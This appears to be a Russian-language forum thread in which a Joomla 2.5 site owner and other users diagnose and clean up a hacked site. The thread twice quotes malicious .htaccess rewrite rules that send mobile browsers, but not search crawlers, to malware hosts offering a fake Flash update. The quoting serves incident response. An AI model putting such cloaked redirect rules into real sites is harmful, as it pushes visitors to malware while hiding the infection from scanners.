Касперский ругается на опасный сайт - Joomla 2.5: Настройка и оптимизация

Доброго времени суток.
мой домен
tuzhilkin.kz
не могу понять, но у меня стоит авира (бесплатная ) и винда 7 стартет.
Никаких замечаний у меня не было по вирусам. На других компах вроде тоже нет замечаний, кот стоят на винде 7.

Как только захожу с ХР и каспер последний (лиценз) то выходит сообщение, что сайт опасный.

Что делать?
Может кто проверить, что с сайтом. Яндекс пишет, что вирусов не обнаружено.
В панели хостинга
"
*Данные об индексировании представлены сервисом Яндекс Вебмастер
"
В каспере еще есть такая функция мол если вы считаете что данный сайт не опасен, то кликните на ссылку. После этого сайт открывается.

Может это от Joomla зависит, или например от модуля. Варез не ставил на сайт, модули все с офиц. сайтов скачаны (по крайней мере с сайтов кот указаны в JED)

Заранее спасибо за ответы.
Если кто вирусы обнаружит сразу в теме пишите, чтоб никто не заходил больше. Я так один раз весь комп удалил.

XP sp3, KIS 2013, не ругается

XP sp3, KIS 2013, не ругается

Ок, спасибо. Гришу на комп. Просто тут такая ситуация, ругаются компы (2 шт) у кот каспер просрочен, и надо обновить. У меня тоже на XP не ругается (вспомнил). Там каспер уже очень давно не обновлялся. В общем буду думать, может проблема в этих двух компах.

В общем вирус на сайте есть как лечить не знаю.

Девайсы вроде Ipad и Планшетов Андройд редиректит на адрес:

tracking.mobiplays.ru/aff_c?offer_id=188aff_id=1010&aff_sub=3338

Как удалить вирь пока не знаю, копаюсь в коде.
У меня имеются копии за несколько месяцев назад, вот думаю все восстановить и попробовать запустить сайт.
Думаю тут еще от хостера может исходить угроза. Мне писали с хостинга, что на сервера были сильнейшие Dos аттаки. В общем буду разбираться.

Поставил себе Каспера 2013 продление, так у меня сразу же "Сайт заблокирован", тк там картинки и CSS грузятся. Пишет снизу справа. В общем пока виря не могу обнаружить.

Если кто сталкивался, или помогите пожалуйста.

.htaccess проверь

Этот вирус переписывает файлы с расширением js и в файле htaccess пере адресация

.htaccess проверь

В упор не вижу что с ним:

Этот вирус переписывает файлы с расширением js и в файле htaccess пере адресация

Вы хотите сказать, что надо все js смореть?

Кстати, там все по хитрому, дело в том, что получается несколько редиректов:
то есть:
сначала редиректит на один адрес вроде, а потом на другой

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|iphone|ipad) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://load.getwap.biz/?l&source=.htaccess [L,R=302] # on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://get-flashupdate.ru/?go&source=.htaccess [L,R=302] # On    /Вот на этот адрес КИС ругается и блокирует переход по ссылке/

Вот этот кусок мне "не нравится". По нему нарыл следующее

Вот этот кусок мне "не нравится". По нему нарыл следующее

УРа!
Точняк!
Блин, точно
спасибо большое
Заменил .htaccess на старый, там такого нет кода
тут все чики пики

На будущее: увидите подобный код

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|iphone|ipad) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://load.getwap.biz/?l&source=.htaccess [L,R=302] # on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://get-flashupdate.ru/?go&source=.htaccess [L,R=302] # On

сразу удоляйте

На будущее: увидите подобный код сразу удоляйте

Код

RewriteEngine on

Но без фанатизма, иначе не будет включен  mod_rewrite

Но без фанатизма, иначе не будет включен  mod_rewrite

а я просто переставил свой старый .htaccess и все заработало!
оч приятно, быстро решили, а я мучался.

Ну еще советую искать шелл и уязвимость в движке/хостинге.

Ну еще советую искать шелл и уязвимость в движке/хостинге.

точно. А то будете каждые два часа переписывать свой .htaccess

И голову на отсечение даю - редирект не только в нем 

Еще один совет - поставьте фаервол.

Снова вскрыли мой .htaccess ну это понятно. Как говорила Taatshi.
Поставил 777 на файл .htaccess пока. Но буду думать как исправить все остальное.
Действительно вскрыли меня конкретно. где то засел вирь. Хостеру напишу завтра. Но думаю надо завязывать, я раньше хостинговался на казахстанском хостинге, два раза вскрывали, но там была проблема баннер просто высвечивался и все, потом поменял права на папки и все стало чики пики. Тут же все по хитрому. С айфоном и ападов меня редиктом на обновление флеша.

to aspidy по подробнее, если можно. С компа вирь залазит? Каспера последнего поставил неделю назад.

tefun, 777 - это полный доступ. И читать, и писать - модифицируйте - не хочу  Может, стоит поставить 644?

Скачайте сайт на комп и прогоните антивирусом. Но снимите с автомата лечить - пусть только информирует. А то он Вам полсайта снесет))

Потом ручками смотрим каждый файл, на который он заругался - обращаем внимание на дату модификации. Если повезет - это может помочь. Смотрим все файлы, модифицированные в это же время.

Возьмите скрипт айболита - на форуме есть - и им проверьте весь сайт. очень толковая вещь, просто супер.

И, конечно, надо найти дырявое расширение и, либо закрыть уязвимость, либо заменить его нафиг.

Пароли все поменять.

tefun, 777 - это полный доступ. И читать, и писать - модифицируйте - не хочу  Может, стоит поставить 644?

блин да, ступил. Я раньше наоборот все права уменьшил. Просто давненько с вирусами не боролся

Скачайте сайт на комп и прогоните антивирусом. Но снимите с автомата лечить - пусть только информирует. А то он Вам полсайта снесет))

Потом ручками смотрим каждый файл, на который он заругался - обращаем внимание на дату модификации. Если повезет - это может помочь. Смотрим все файлы, модифицированные в это же время.


Возьмите скрипт айболита - на форуме есть - и им проверьте весь сайт. очень толковая вещь, просто супер.

Не знал, буду тестить

И, конечно, надо найти дырявое расширение и, либо закрыть уязвимость, либо заменить его нафиг.

С этим проблемы

Пароли все поменять.

уже сделано

 Taatshi +

Методы лечения:
1 Откат к не зараженной версии.
2 Поверх накатать актуальную версию
3 Сверить все файлы
4 Проверить файлы сервера
5 Выкинуть все лишнее
Данный вирус - целенаправленный проверьте все мобильные устройства с которых заходили на сайт. И лучше переехать с казахских хостов (хотя законом это запрещено)

Регистрация включена?

Регистрация включена?

На тот момент реги не было, недавно поставил для себя (чтобы писать статьи). Теперь убирать буду

Короче, снова меня вскрыли
Все сменил, щас сайт на Вирь проверяю
__________________________
Блин ребята...Я сменил пароль, а новый пароль не сохранил, точнее думал, что сохранил, но! сохранил не тот файл!
Никогда не думал, что окажусь на месте тех, кто будет спрашивать на этом форуме:
Как мне зайти на сайт?
Тэкс...У меня есть доступ...в БД, а к FTP я потерял..так то!
Хостеру написал, но что толку...все равно завтра только утром ответит.

Мысли имеются, кидайте в личку

Спасибо Смарти
В офф-лайне проверил каспером сайт:
Как говорил выше, все пароли заменил с 12345678rert на непонятные.
Просто меня с 2010 никто не вскрывал (пароли вообще не менялись) Вскрывали только хостера (тк вместе со мной еще пару десятков сайтов, но щас хостер другой - хостланд, кстати, они мне щас все расписали, как восстановить)

Блин ребята...Я сменил пароль, а новый пароль не сохранил, точнее думал, что сохранил, но! сохранил не тот файл!

Если есть хоть какой то пароль все остальные доступы можно восстановить.  Доступ к админ панели можно восстанавливать имея доступ к базе. Доступ к базе прописан в файлах конфигурации. Доступ к FTP можно извлечь имея доступ к панели. Напишите в личку какие пароли есть и что хотите восстановить.

Если есть хоть какой то пароль все остальные доступы можно восстановить.  Доступ к админ панели можно восстанавливать имея доступ к базе. Доступ к базе прописан в файлах конфигурации. Доступ к FTP можно извлечь имея доступ к панели. Напишите в личку какие пароли есть и что хотите восстановить.

100%, точно, просто кипишь.
А Вот способ N2 от Smart, когда Супер администратор забыл пароль и хочет его по почте восстановить - не прокатит. Только через БД - второй способ.
Дело в том, что Сперадминистратор не может воостановить свой пароль по почте.
Впринципе, это правильно и логично, так как суперадмин же необычный пользователь Joomla. Он за все отвечает и все может поменять..так то, так что первый способ отпадает (забыл вчера написать)